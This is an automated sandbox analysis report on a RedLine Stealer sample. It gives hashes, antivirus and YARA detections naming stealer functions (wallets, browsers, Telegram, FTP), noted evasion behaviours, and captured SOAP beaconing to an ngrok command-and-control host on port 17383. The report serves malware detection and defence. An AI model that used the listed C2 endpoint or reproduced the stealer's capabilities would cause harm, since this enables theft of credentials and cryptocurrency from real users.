Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
kuEfaZxkiY.exe

Overview

General Information

Sample name:kuEfaZxkiY.exe
renamed because original name is a hash value
Original sample name:117EEF8A227E6CE3646718D0ED6FB7B1.exe
Analysis ID:1393953
MD5:117eef8a227e6ce3646718d0ed6fb7b1
SHA1:db6e21bf637604aa0be4f73142a1b7447cc83553
SHA256:80488bf5f30ea2398ff207b9045a0e230aff2d052ea56156a0e96b57784dc0e5
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Yara detected RedLine Stealer
Machine Learning detection for sample
Uses known network protocols on non-standard ports
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • kuEfaZxkiY.exe (PID: 7080 cmdline: C:\Users\user\Desktop\kuEfaZxkiY.exe MD5: 117EEF8A227E6CE3646718D0ED6FB7B1)
    • conhost.exe (PID: 7160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
kuEfaZxkiY.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    kuEfaZxkiY.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      kuEfaZxkiY.exeWindows_Trojan_RedLineStealer_f54632ebunknownunknown
      • 0x135ca:$a4: get_ScannedWallets
      • 0x12428:$a5: get_ScanTelegram
      • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
      • 0x1106a:$a7: <Processes>k__BackingField
      • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
      • 0x1099e:$a9: <ScanFTP>k__BackingField
      kuEfaZxkiY.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
      • 0x1048a:$u7: RunPE
      • 0x13b41:$u8: DownloadAndEx
      • 0x9130:$pat14: , CommandLine:
      • 0x13079:$v2_1: ListOfProcesses
      • 0x1068b:$v2_2: get_ScanVPN
      • 0x1072e:$v2_2: get_ScanFTP
      • 0x1141e:$v2_2: get_ScanDiscord
      • 0x1240c:$v2_2: get_ScanSteam
      • 0x12428:$v2_2: get_ScanTelegram
      • 0x124ce:$v2_2: get_ScanScreen
      • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
      • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
      • 0x13509:$v2_2: get_ScanBrowsers
      • 0x135ca:$v2_2: get_ScannedWallets
      • 0x135f0:$v2_2: get_ScanWallets
      • 0x13610:$v2_3: GetArguments
      • 0x11cd9:$v2_4: VerifyUpdate
      • 0x165f2:$v2_4: VerifyUpdate
      • 0x139ca:$v2_5: VerifyScanRequest
      • 0x130c6:$v2_6: GetUpdates
      • 0x165d3:$v2_6: GetUpdates

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000000.00000000.1687162319.0000000000862000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x133ca:$a4: get_ScannedWallets
          • 0x12228:$a5: get_ScanTelegram
          • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
          • 0x10e6a:$a7: <Processes>k__BackingField
          • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x1079e:$a9: <ScanFTP>k__BackingField
          Process Memory Space: kuEfaZxkiY.exe PID: 7080JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: kuEfaZxkiY.exe PID: 7080JoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 1 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.0.kuEfaZxkiY.exe.860000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.0.kuEfaZxkiY.exe.860000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0.0.kuEfaZxkiY.exe.860000.0.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x135ca:$a4: get_ScannedWallets
                  • 0x12428:$a5: get_ScanTelegram
                  • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
                  • 0x1106a:$a7: <Processes>k__BackingField
                  • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0x1099e:$a9: <ScanFTP>k__BackingField
                  0.0.kuEfaZxkiY.exe.860000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x1048a:$u7: RunPE
                  • 0x13b41:$u8: DownloadAndEx
                  • 0x9130:$pat14: , CommandLine:
                  • 0x13079:$v2_1: ListOfProcesses
                  • 0x1068b:$v2_2: get_ScanVPN
                  • 0x1072e:$v2_2: get_ScanFTP
                  • 0x1141e:$v2_2: get_ScanDiscord
                  • 0x1240c:$v2_2: get_ScanSteam
                  • 0x12428:$v2_2: get_ScanTelegram
                  • 0x124ce:$v2_2: get_ScanScreen
                  • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x13509:$v2_2: get_ScanBrowsers
                  • 0x135ca:$v2_2: get_ScannedWallets
                  • 0x135f0:$v2_2: get_ScanWallets
                  • 0x13610:$v2_3: GetArguments
                  • 0x11cd9:$v2_4: VerifyUpdate
                  • 0x165f2:$v2_4: VerifyUpdate
                  • 0x139ca:$v2_5: VerifyScanRequest
                  • 0x130c6:$v2_6: GetUpdates
                  • 0x165d3:$v2_6: GetUpdates

                  Sigma Signatures

                  No Sigma rule has matched

                  Snort Signatures

                  No Snort rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: kuEfaZxkiY.exeAvira: detected
                  Antivirus detection for URL or domain
                  Source: http://0.tcp.in.ngrok.io:17383/Avira URL Cloud: Label: malware
                  Source: http://0.tcp.in.ngrok.io:17383Avira URL Cloud: Label: malware
                  Source: http://0.tcp.in.ngrok.ioAvira URL Cloud: Label: malware
                  Source: http://0.tcp.in.ngrok.io:17383/.Avira URL Cloud: Label: malware
                  Multi AV Scanner detection for domain / URL
                  Source: 0.tcp.in.ngrok.ioVirustotal: Detection: 8%Perma Link
                  Source: http://0.tcp.in.ngrok.ioVirustotal: Detection: 8%Perma Link
                  Source: http://0.tcp.in.ngrok.io:17383/Virustotal: Detection: 8%Perma Link
                  Source: http://0.tcp.in.ngrok.io:17383Virustotal: Detection: 8%Perma Link
                  Source: http://0.tcp.in.ngrok.io:17383/.Virustotal: Detection: 8%Perma Link
                  Multi AV Scanner detection for submitted file
                  Source: kuEfaZxkiY.exeReversingLabs: Detection: 86%
                  Source: kuEfaZxkiY.exeVirustotal: Detection: 77%Perma Link
                  Machine Learning detection for sample
                  Source: kuEfaZxkiY.exeJoe Sandbox ML: detected
                  Source: kuEfaZxkiY.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: kuEfaZxkiY.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: kuEfaZxkiY.exe, 00000000.00000002.2945747636.000000000100E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.ServiceModel.pdb693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32d source: kuEfaZxkiY.exe, 00000000.00000002.2945747636.000000000100E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: kuEfaZxkiY.exe, 00000000.00000002.2945747636.000000000100E000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: kuEfaZxkiY.exe, 00000000.00000002.2945747636.000000000100E000.00000004.00000020.00020000.00000000.sdmp

                  Networking

                  barindex
                  Uses known network protocols on non-standard ports
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 17383
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 17383
                  Source: global trafficTCP traffic: 192.168.2.4:49729 -> 3.6.115.182:17383
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Accept-Encoding: gzip, deflateHost: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Accept-Encoding: gzip, deflateHost: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Accept-Encoding: gzip, deflateHost: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Accept-Encoding: gzip, deflateHost: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Accept-Encoding: gzip, deflateHost: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Accept-Encoding: gzip, deflateHost: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Accept-Encoding: gzip, deflateHost: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Accept-Encoding: gzip, deflateHost: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Accept-Encoding: gzip, deflateHost: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Accept-Encoding: gzip, deflateHost: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Accept-Encoding: gzip, deflateHost: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Accept-Encoding: gzip, deflateHost: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Accept-Encoding: gzip, deflateHost: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 3.6.115.182 3.6.115.182
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownDNS traffic detected: queries for: 0.tcp.in.ngrok.io
                  Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 0.tcp.in.ngrok.io:17383Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.tcp.in.ngrok.io
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.tcp.in.ngrok.io:17383
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.tcp.in.ngrok.io:17383/
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.tcp.in.ngrok.io:17383/.
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DAC000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DAC000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/0
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/8
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D9F000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectLR
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/CheckConnectT
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsLR
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesLR
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
                  Source: kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002DC9000.00000004.00000800.00020000.00000000.sdmp, kuEfaZxkiY.exe, 00000000.00000002.2946473125.0000000002D01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentLR
